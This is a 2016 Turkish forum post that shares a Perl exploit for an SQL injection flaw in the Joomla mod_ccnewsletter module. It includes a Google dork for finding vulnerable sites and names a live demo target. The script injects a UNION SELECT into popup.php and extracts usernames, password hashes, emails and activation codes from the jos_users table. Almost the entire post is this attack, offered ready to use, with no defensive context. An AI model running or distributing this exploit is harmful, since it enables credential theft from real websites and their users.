Joomla Component (mod_ccnewsletter) Sql Injection Vulnerablity & Exploiter

'Tool' forumunda KaliBot tarafından 22 Şubat 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Moderator

    Katılım:
    30 Haziran 2015
    Mesaj:
    582
    Beğeniler:
    80
    Ödül Puanları:
    12
    Web Sitesi:

    Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php

    Demo site : http://www.armandopace.com

    Kod:
    #############
    #Perl code by gabby
    #############
    
    #!/usr/bin/perl -w
    
    use LWP::UserAgent;
    print "\n[+]===========================================[+]\n";
    print " |   Simple joomla mod_ccnewsletter exploiter  |\n";
    print "[+]===========================================[+]\n";
    print "\n[!] insert ur target [http://target.com/path ] : \n==> ";
    chomp(my $target=<STDIN>);
    print "\nScaning target.....\n";
    print "Wait a Few seconds.....\n";
    $sarap="concat(0x5f55,username,0x555f5f50,password,0x505f3a5f45,email,0x455f5f41,activation,0x415f5f54,usertype,0x545f)";
    $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)');
    $sableng = $target . "/modules/mod_ccnewsletter/helper/popup.php?id=-14 UNION ALL SELECT 1,".$sarap.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users#";
    $mbahmu = $ua->request(HTTP::Request->new(GET=>$sableng));
    $ndablek = $mbahmu->content;
            if ($ndablek =~ m/_U(.*)U_/){
            print "\n==> Exploit Success.....! ";
            print "\n[+] Sitename : $target";
            print "\n[+] Username : $1";
        }
        if ($ndablek =~ m/_P(.*)P_/){
        print "\n[+] Password : $1";
            }
        if ($ndablek =~ m/_E(.*)E_/){
        print "\n[+] Email : $1";
        }
        if ($ndablek =~ m/_T(.*)T_/){
        print "\n[+] Usertype : $1";
        }
        if ($ndablek =~ m/_A(.*)A_/){
        print "\n[+] Activation : $1\n";
    print "\nHave fun dude... ! \n\n";
        }
    else{print "\n==> Exploit Failed !\n";
    }
     

Bu Sayfayı Paylaş

Share